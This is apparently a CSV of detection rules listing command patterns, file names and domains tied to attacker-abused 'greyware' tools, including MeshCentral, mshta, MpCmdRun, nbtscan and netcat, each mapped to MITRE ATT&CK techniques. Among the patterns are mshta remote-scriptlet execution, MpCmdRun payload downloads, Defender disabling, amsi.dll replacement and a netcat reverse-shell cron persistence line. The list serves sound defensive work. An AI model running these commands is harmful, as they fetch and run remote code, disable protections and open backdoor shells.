"*MeshAgent-NodeJS*",".{0,1000}MeshAgent\-NodeJS.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshAgentOSXPackager.zip*",".{0,1000}MeshAgentOSXPackager\.zip.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshAgent-WinMinCore-Console-x86-32.exe*",".{0,1000}MeshAgent\-WinMinCore\-Console\-x86\-32\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshAgent-WinMinCore-Service-x86-64.exe*",".{0,1000}MeshAgent\-WinMinCore\-Service\-x86\-64\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*Meshcentral - WebRTC Sample Server*",".{0,1000}Meshcentral\s\-\sWebRTC\sSample\sServer.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*MeshCentral HTTP server port *",".{0,1000}MeshCentral\sHTTP\sserver\sport\s.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshCentral Satellite could not create a 802.1x profile for this device*",".{0,1000}MeshCentral\sSatellite\scould\snot\screate\sa\s802\.1x\sprofile\sfor\sthis\sdevice.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshCentral Server TCP ports*",".{0,1000}MeshCentral\sServer\sTCP\sports.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshCentral Server UDP ports*",".{0,1000}MeshCentral\sServer\sUDP\sports.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshcentral.exe*",".{0,1000}meshcentral\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshcentral.serverstats*",".{0,1000}meshcentral\.serverstats.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshCentralAssistant.exe*",".{0,1000}MeshCentralAssistant\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshCentralInstaller.exe*",".{0,1000}MeshCentralInstaller\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshcentralinstaller.exe*",".{0,1000}meshcentralinstaller\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshcentral-plugins.db*",".{0,1000}meshcentral\-plugins\.db.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshCentralRoot-*",".{0,1000}MeshCentralRoot\-.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshCentralRouter.exe*",".{0,1000}MeshCentralRouter\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshCentralServer.njsproj*",".{0,1000}MeshCentralServer\.njsproj.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshcentral-smbios.db*",".{0,1000}meshcentral\-smbios\.db.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshCmd64.exe*",".{0,1000}MeshCmd64\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshcmdService.run*",".{0,1000}meshcmdService\.run.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*MeshCmd-signed.exe*",".{0,1000}MeshCmd\-signed\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshcommander install*",".{0,1000}meshcommander\sinstall.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshcommander start*",".{0,1000}meshcommander\sstart.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshcommander stop*",".{0,1000}meshcommander\sstop.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshcommander uninstall*",".{0,1000}meshcommander\suninstall.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshConsole64.exe*",".{0,1000}MeshConsole64\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshConsoleARM64.exe*",".{0,1000}MeshConsoleARM64\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshinstall-initd.sh*",".{0,1000}meshinstall\-initd\.sh.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshinstall-linux.sh*",".{0,1000}meshinstall\-linux\.sh.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshService.exe*",".{0,1000}MeshService\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*rootcert.meshcentral.com*",".{0,1000}rootcert\.meshcentral\.com.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*swarm.meshcentral.com*",".{0,1000}swarm\.meshcentral\.com.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*Uploading MeshCommander*",".{0,1000}Uploading\sMeshCommander.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*wss://meshcentral.com*",".{0,1000}wss\:\/\/meshcentral\.com.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*Ylianst/MeshAgent*",".{0,1000}Ylianst\/MeshAgent.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","1","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*Ylianst/MeshCentral*",".{0,1000}Ylianst\/MeshCentral.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*\AppData\Local\CoreAIPlatform.00\UKP\*\ukg.db*",".{0,1000}\\AppData\\Local\\CoreAIPlatform\.00\\UKP\\.{0,1000}\\ukg\.db.{0,1000}","greyware_tool_keyword","Microsoft Recall","data from the Recall feature in Windows 11 - recall is enable on the computer","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","N/A","1","0","N/A","will trigger if  recall is enable on the computer","8","10","N/A","N/A","N/A","N/A"
"*mkdir ~/.bash_history*",".{0,1000}mkdir\s\~\/\.bash_history.{0,1000}","greyware_tool_keyword","mkdir","delete bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*modprobe -r*",".{0,1000}modprobe\s\-r.{0,1000}","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","N/A","greyware tool - risks of False positive !","5","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*modprobe --remove*",".{0,1000}modprobe\s\-\-remove.{0,1000}","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","N/A","greyware tool - risks of False positive !","5","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*modprobe rmmod -r*",".{0,1000}modprobe\srmmod\s\-r.{0,1000}","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","N/A","greyware tool - risks of False positive !","5","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*movefile64.exe /nobanner *.dll C:\Windows\System32\amsi.dll*",".{0,1000}movefile64\.exe\s\/nobanner\s.{0,1000}\.dll\sC\:\\Windows\\System32\\amsi\.dll.{0,1000}","greyware_tool_keyword","movefile64.exe","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*MpCmdRun.exe -DownloadFile -url http://*.exe -path *",".{0,1000}MpCmdRun\.exe\s\-DownloadFile\s\-url\shttp\:\/\/.{0,1000}\.exe\s\-path\s.{0,1000}","greyware_tool_keyword","MpCmdRun","MpCmdRun LOLBAS exploitation observed used by threat actors","T1105","TA0009 ","N/A","N/A","Collection","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*MpCmdRun.exe* -disable*",".{0,1000}MpCmdRun\.exe.{0,1000}\s\-disable.{0,1000}","greyware_tool_keyword","MpCmdRun","Defense evasion technique disable windows defender","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*MpCmdRun.exe* -RemoveDefinitions -All*",".{0,1000}MpCmdRun\.exe\s\-RemoveDefinitions\s\-All.{0,1000}","greyware_tool_keyword","MpCmdRun","Wipe currently stored definitions","T1562.004 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*forfiles.exe* /p * /m * /c *powershell . mshta*",".{0,1000}forfiles\.exe.{0,1000}\s\/p\s.{0,1000}\s\/m\s.{0,1000}\s\/c\s.{0,1000}powershell\s\.\smshta.{0,1000}","greyware_tool_keyword","mshta","using forfiles and mshta likely to evade detection and execute malicious code. It combines file enumeration with scripting and HTML-based execution which is commonly seen in malware or sophisticated attacks","T1083 - T1059 - T1203","TA0002 - TA0005 - TA0009","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*mshta ""C:\Users\Public\*",".{0,1000}mshta\s\""C\:\\Users\\Public\\.{0,1000}","greyware_tool_keyword","mshta","executing from public folder","T1218.005 - T1059.003 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*mshta http*.hta*",".{0,1000}mshta\shttp.{0,1000}\.hta.{0,1000}","greyware_tool_keyword","mshta","mshta abused by attackers","T1218.005 - T1105","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://lolbas-project.github.io/lolbas/Binaries/Mshta/","1","0","N/A","FP risks","10","10","N/A","N/A","N/A","N/A"
"*mshta https://tinyurl.com/*",".{0,1000}mshta\shttps\:\/\/tinyurl\.com\/.{0,1000}","greyware_tool_keyword","mshta","downloading from tinyurl","T1204.002 - T1105 - T1071.001 - T1102.003","TA0009 ","N/A","N/A","Collection","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*mshta javascript:*script:https:*",".{0,1000}mshta\sjavascript\:.{0,1000}script\:https\:.{0,1000}","greyware_tool_keyword","mshta","mshta abused by attackers","T1218.005 - T1105","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://lolbas-project.github.io/lolbas/Binaries/Mshta/","1","0","N/A","FP risks","10","10","N/A","N/A","N/A","N/A"
"*mshta javascript:a=(GetObject(""script:http*.sct*)).Exec();close();*",".{0,1000}mshta\sjavascript\:a\=\(GetObject\(\""script\:http.{0,1000}\.sct.{0,1000}\)\)\.Exec\(\)\;close\(\)\;.{0,1000}","greyware_tool_keyword","mshta","Invoking a scriptlet file hosted remotely","T1218.005 - T1059.001 - T1105","TA0002 - TA0009","N/A","N/A","Collection","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*mshta vbscript:Close(Execute(*script:https://*.sct*",".{0,1000}mshta\svbscript\:Close\(Execute\(.{0,1000}script\:https\:\/\/.{0,1000}\.sct.{0,1000}","greyware_tool_keyword","mshta","mshta abused by attackers","T1218.005 - T1105","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://lolbas-project.github.io/lolbas/Binaries/Mshta/","1","0","N/A","FP risks","10","10","N/A","N/A","N/A","N/A"
"*mshta.exe https://tinyurl.com/*",".{0,1000}mshta\.exe\shttps\:\/\/tinyurl\.com\/.{0,1000}","greyware_tool_keyword","mshta","downloading from tinyurl","T1204.002 - T1105 - T1071.001 - T1102.003","TA0009 ","N/A","N/A","Collection","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*mshta.exe javascript:a=(GetObject(""script:http*.sct*)).Exec();close();*",".{0,1000}mshta\.exe\sjavascript\:a\=\(GetObject\(\""script\:http.{0,1000}\.sct.{0,1000}\)\)\.Exec\(\)\;close\(\)\;.{0,1000}","greyware_tool_keyword","mshta","Invoking a scriptlet file hosted remotely","T1218.005 - T1059.001 - T1105","TA0002 - TA0009","N/A","N/A","Collection","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*mshta.exe* ""C:\Users\Public\*",".{0,1000}mshta\.exe.{0,1000}\s\""C\:\\Users\\Public\\.{0,1000}","greyware_tool_keyword","mshta","executing from public folder","T1218.005 - T1059.003 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*mshta.exe* http://*",".{0,1000}mshta\.exe.{0,1000}\shttp\:\/\/.{0,1000}","greyware_tool_keyword","mshta","mshta abused by attackers","T1218.005 - T1105","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://lolbas-project.github.io/lolbas/Binaries/Mshta/","1","0","N/A","FP risks","10","10","N/A","N/A","N/A","N/A"
"*mshta.exe* https://*",".{0,1000}mshta\.exe.{0,1000}\shttps\:\/\/.{0,1000}","greyware_tool_keyword","mshta","mshta abused by attackers","T1218.005 - T1105","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://lolbas-project.github.io/lolbas/Binaries/Mshta/","1","0","N/A","FP risks","10","10","N/A","N/A","N/A","N/A"
"*mshta.exe* javascript:*script:https:*",".{0,1000}mshta\.exe.{0,1000}\sjavascript\:.{0,1000}script\:https\:.{0,1000}","greyware_tool_keyword","mshta","mshta abused by attackers","T1218.005 - T1105","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://lolbas-project.github.io/lolbas/Binaries/Mshta/","1","0","N/A","FP risks","10","10","N/A","N/A","N/A","N/A"
"*mshta.exe* vbscript:Close(Execute(*script:https://*.sct*",".{0,1000}mshta\.exe.{0,1000}\svbscript\:Close\(Execute\(.{0,1000}script\:https\:\/\/.{0,1000}\.sct.{0,1000}","greyware_tool_keyword","mshta","mshta abused by attackers","T1218.005 - T1105","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://lolbas-project.github.io/lolbas/Binaries/Mshta/","1","0","N/A","FP risks","10","10","N/A","N/A","N/A","N/A"
"*edknjdjielmpdlnllkdmaghlbpnmjmgb*",".{0,1000}edknjdjielmpdlnllkdmaghlbpnmjmgb.{0,1000}","greyware_tool_keyword","Muscle VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*ppajinakbfocjfnijggfndbdmjggcmde*",".{0,1000}ppajinakbfocjfnijggfndbdmjggcmde.{0,1000}","greyware_tool_keyword","My Browser Vpn","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*https://myexternalip.com/raw*",".{0,1000}https\:\/\/myexternalip\.com\/raw.{0,1000}","greyware_tool_keyword","myexternalip.com","return external ip address","T1046 - T1595 - T1595.001","TA0007 - TA0040","N/A","N/A","Reconnaissance","https://myexternalip.com/raw","1","1","N/A","False positives warning - used by some C2 projects but legitimate site","1","6","N/A","N/A","N/A","N/A"
"*.myftp.biz*",".{0,1000}\.myftp\.biz.{0,1000}","greyware_tool_keyword","myftp.biz","dyndns - lots of subdomains associated with malwares - could be used in various ways for both legitimate and malicious activities (malicious mostly)","T1071 - T1021 - T1095 - T1059","TA0010 - TA0008 - TA0009 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/hagezi/dns-blocklists/blob/9d6562bddc175b59241d5935531f648cd6b6d9c8/rpz/dyndns.txt#L103","1","1","N/A","N/A","10","10","5644","197","2024-08-30T12:38:19Z","2022-04-25T07:13:09Z"
"*.myftp.org*",".{0,1000}\.myftp\.org.{0,1000}","greyware_tool_keyword","myftp.org","dyndns - lots of subdomains associated with malwares - myftp.org could be used in various ways for both legitimate and malicious activities (malicious mostly)","T1071 - T1021 - T1095 - T1059","TA0010 - TA0008 - TA0009 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/pan-unit42/iocs/blob/master/rat_nest/iocs.csv","1","1","N/A","N/A","10","7","695","151","2024-08-29T23:27:10Z","2015-06-04T13:37:09Z"
"*https://api.my-ip.io/ip*",".{0,1000}https\:\/\/api\.my\-ip\.io\/ip.{0,1000}","greyware_tool_keyword","my-ip.io","abused by ransomwares","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","1","#yara","N/A","4","3","294","43","2024-08-30T12:07:16Z","2021-07-28T21:00:52Z"
"*nbtscan *.*/24",".{0,1000}nbtscan\s.{0,1000}\..{0,1000}\/24","greyware_tool_keyword","nbtscan","Scan for Active Machines and Gather NetBIOS Information","T1135 - T1046","TA0007 - TA0009","N/A","Dagon Locker","Discovery","N/A","1","0","N/A","N/A","5","2","N/A","N/A","N/A","N/A"
"*nbtscan -r */24*",".{0,1000}nbtscan\s\-r\s.{0,1000}\/24.{0,1000}","greyware_tool_keyword","nbtscan","smb enumeration","T1135 - T1046","TA0007 - TA0009","N/A","Dagon Locker","Discovery","https://github.com/charlesroelli/nbtscan","1","0","N/A","N/A","5","2","135","27","2016-05-26T20:16:52Z","2016-05-26T20:16:33Z"
"*nbtscan -s : *",".{0,1000}nbtscan\s\-s\s\:\s.{0,1000}","greyware_tool_keyword","nbtscan","Identify Potential Points for Man-in-the-Middle Attacks","T1135 - T1046","TA0007 - TA0009","N/A","Dagon Locker","Discovery","N/A","1","0","N/A","N/A","5","2","N/A","N/A","N/A","N/A"
"*nbtstat -n*",".{0,1000}nbtstat\s\-n.{0,1000}","greyware_tool_keyword","nbtstat","Displays the NetBIOS name table of the local computer. The status of registered indicates that the name is registered either by broadcast or with a WINS server.","T1049 - T1018 - T1046 - T1016 - T1049","TA0007 - TA0009","N/A","Turla","Discovery","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/nbtstat","1","0","N/A","N/A","4","10","N/A","N/A","N/A","N/A"
"* /bin/nc * -e /bin/bash* > cron && crontab cron*",".{0,1000}\s\/bin\/nc\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}\s\>\scron\s\&\&\scrontab\scron.{0,1000}","greyware_tool_keyword","nc","Linux Persistence Shell cron","T1053 - T1037","TA0003","N/A","N/A","Persistence","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"* /bin/nc * -e /bin/bash*> * crontab cron*",".{0,1000}\s\/bin\/nc\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}\>\s.{0,1000}\scrontab\scron.{0,1000}","greyware_tool_keyword","nc","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
